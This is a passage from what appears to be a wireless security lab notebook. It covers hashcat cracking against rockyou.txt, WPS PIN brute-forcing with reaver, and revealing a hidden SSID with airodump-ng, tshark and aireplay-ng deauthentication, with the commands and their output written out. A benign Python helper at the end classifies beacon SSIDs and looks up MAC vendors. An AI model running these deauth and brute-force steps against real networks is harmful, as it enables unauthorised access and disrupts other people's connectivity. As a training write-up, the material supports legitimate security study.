Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      488 H/s (0.94ms) @ Accel:1 Loops:1024 Thr:1 Vec:8
Recovered........: 0/23 (0.00%) Digests (total), 0/23 (0.00%) Digests (new), 0/13 (0.00%) Salts
Progress.........: 496666/186477005 (0.27%)
Rejected.........: 332644/496666 (66.98%)
Restore.Point....: 38204/14344385 (0.27%)
Restore.Sub.#1...: Salt:7 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: september30 -> september22

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
```

## Hacking WPS

```bash
wash -i wlan0mon

BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
00:22:75:E2:8C:2A    1  -50  1.0  No   RalinkTe  OPENSOURCE
```

```bash
reaver -i wlan0mon -b 00:22:75:E2:8C:2A -d 30 -S -N -vv

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:22:75:E2:8C:2A
[+] Switching wlan0mon to channel 1
[+] Received beacon from 00:22:75:E2:8C:2A
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request
```

```bash
[root@wireless ~]# reaver -i wlan0mon -b 00:22:75:E2:8C:2A -p 19806716 -vv
```

## How to discover hidden SSID

```bash
[root@wireless ~]# airodump-ng wlan0mon

 CH  7 ][ Elapsed: 12 s ][ 2022-10-11 22:42

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:18:39:E4:61:28  -40        7        0    0   6   54e  WPA2 CCMP   PSK  <length: 10>
 62:AF:97:C2:4E:24  -34        7        0    0   6  130   WPA2 CCMP   PSK  ARTEMIS
 5E:AF:97:C2:4E:24  -33        7        0    0   6  130   WPA2 CCMP   PSK  NARUTO
 5A:AF:97:C2:4E:24  -34        9        0    0   6  130   WPA2 CCMP   PSK  TOTORO
 54:AF:97:C2:4E:24  -33        9        0    0   6  130   WPA2 CCMP   PSK  YOSHI
```

The hidden network shows up as `<length: 10>` in the ESSID column: its beacons carry a 10-byte SSID field but no readable name. Capture packets from that BSSID:

```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w hidden-ssid wlan0mon

 CH  6 ][ Elapsed: 24 s ][ 2022-10-11 22:51

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:18:39:E4:61:28  -43 100      265        0    0   6   54e  WPA2 CCMP   PSK  <length: 10>

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
```

```bash
[root@wireless ~]# tshark -r hidden-ssid-01.cap "wlan.ta == 00:18:39:E4:61:28"
Running as user "root" and group "root". This could be dangerous.
    2 0.055007 Cisco-Li_e4:61:28 → Broadcast    802.11 138 Beacon frame, SN=3347, FN=0, Flags=........, BI=100, SSID=\000\000\000\000\000\000\000\000\000\000
```

Open the capture in Wireshark and apply the display filter `wlan.ta==00:18:39:E4:61:28`:

![](https://i.imgur.com/MSYPLeg.png)

```bash
[root@wireless ~]# aireplay-ng -0 10 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon
23:04:51  Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:04:52  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:52  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [118|118 ACKs]
23:04:53  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:53  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:54  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [116|116 ACKs]
23:04:55  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:55  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [114|114 ACKs]
23:04:56  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [94|94 ACKs]
23:04:56  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [143|143 ACKs]
23:04:57  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [111|111 ACKs]
```

Once the client reconnects, its probe and association frames carry the SSID in the clear, and airodump-ng fills in the ESSID column:

```bash
 CH  6 ][ Elapsed: 6 s ][ 2022-10-11 23:38 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:18:39:E4:61:28  -45 100       68       28    6   6   54e  WPA2 CCMP   PSK  OPENSOURCE

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:18:39:E4:61:28  16:41:DA:4E:36:EA  -43   1e- 1e    177      129  EAPOL  OPENSOURCE
```

## MAC Address Vendors

You can use the following link to identify the MAC address vendor: https://macvendors.com/

Or use the following command on Kali:

```bash!
[root@wireless ~]# grep -i <FIRST 6 CHARS OF MAC ADDRESS> /var/lib/ieee-data/oui.txt
```

## Restore the services

```bash!
[root@wireless ~]# systemctl start NetworkManager.service
[root@wireless ~]# systemctl start wpa_supplicant.service
```

## References

- https://www.aircrack-ng.org/
- https://www.youtube.com/watch?v=knllpZF508k
- https://www.youtube.com/watch?v=_OyJ62fP648
- https://www.yeahhub.com/bypass-hidden-ssid-wireless-network-full-proof-method/
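An audit helper tying together the hidden-SSID and MAC-vendor sections above, added here and not part of the original lab: it walks the tagged parameters of an 802.11 beacon frame body to tell a hidden SSID (what airodump-ng prints as `<length: 10>`) from a broadcast one, and resolves the BSSID vendor from text in the layout of the IEEE `oui.txt` file that the grep command consults. The beacon bodies and the `oui.txt` excerpt are constructed for this example; the vendor names in it are placeholders, not entries copied from the IEEE registry.

```python
"""Beacon SSID classification plus OUI vendor lookup for a wireless inventory row."""
import re
import struct

# Element IDs from IEEE 802.11 (tagged parameters in management frames)
EID_SSID = 0
EID_DS_PARAMS = 3   # carries the channel number

# Constructed excerpt in the oui.txt layout ("XX-XX-XX   (hex)   Vendor").
OUI_TXT_SAMPLE = """\
00-18-39   (hex)\t\tConstructed Router Vendor LLC
001839     (base 16)\t\tConstructed Router Vendor LLC
\t\t\t\t1 Example Street
\t\t\t\tUS

00-C0-CA   (hex)\t\tConstructed Adapter Vendor Inc
00C0CA     (base 16)\t\tConstructed Adapter Vendor Inc
"""

_OUI_HEX_LINE = re.compile(
    r"^([0-9A-F]{2})-([0-9A-F]{2})-([0-9A-F]{2})\s+\(hex\)\s+(.+?)\s*$", re.M)


def load_oui_table(text):
    """Map a 6-hex-digit OUI prefix to its vendor string."""
    return {"".join(m.group(1, 2, 3)): m.group(4) for m in _OUI_HEX_LINE.finditer(text)}


def vendor_for(mac, oui_table):
    """Look up the first three octets of a MAC written in any common notation."""
    prefix = re.sub(r"[^0-9a-fA-F]", "", mac)[:6].upper()
    return oui_table.get(prefix, "unknown")


def parse_beacon_elements(body):
    """Yield (element_id, value) pairs from the tagged parameters of a beacon body."""
    pos = 12  # fixed fields: timestamp(8) + beacon interval(2) + capability(2)
    while pos + 2 <= len(body):
        eid, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        yield eid, value
        pos += 2 + length


def describe_ssid(value):
    """Return (display_name, hidden) the way airodump-ng presents the ESSID column."""
    if len(value) == 0:
        return "<length: 0>", True
    if not value.strip(b"\x00"):          # null-padded SSID, the lab's case
        return f"<length: {len(value)}>", True
    return value.decode("utf-8", "replace"), False


def audit_beacon(bssid, body, oui_table):
    """Summarise one beacon as an inventory row: vendor, SSID state, channel."""
    ssid, hidden, channel = None, None, None
    for eid, value in parse_beacon_elements(body):
        if eid == EID_SSID:
            ssid, hidden = describe_ssid(value)
        elif eid == EID_DS_PARAMS and value:
            channel = value[0]
    return {"bssid": bssid.upper(), "vendor": vendor_for(bssid, oui_table),
            "ssid": ssid, "hidden": hidden, "channel": channel}


def make_beacon_body(ssid_bytes, channel):
    """Construct a beacon body with SSID, supported-rates and DS parameter elements."""
    fixed = struct.pack("<QHH", 0, 100, 0x0411)       # timestamp, interval, capability
    ies = bytes([EID_SSID, len(ssid_bytes)]) + ssid_bytes
    ies += bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])      # supported rates 1/2/5.5/11 Mbit
    ies += bytes([EID_DS_PARAMS, 1, channel])
    return fixed + ies


if __name__ == "__main__":
    table = load_oui_table(OUI_TXT_SAMPLE)
    print(audit_beacon("00:18:39:E4:61:28", make_beacon_body(b"\x00" * 10, 6), table))
    print(audit_beacon("00:18:39:E4:61:28", make_beacon_body(b"OPENSOURCE", 6), table))
```

A hidden SSID is an inventory detail, not a control: as the tshark output above shows, the beacon still advertises the network (and its BSSID, channel and cipher suite), and the name travels in the clear in every probe and association exchange. Treat "SSID hidden" as a finding to document, not as a mitigation.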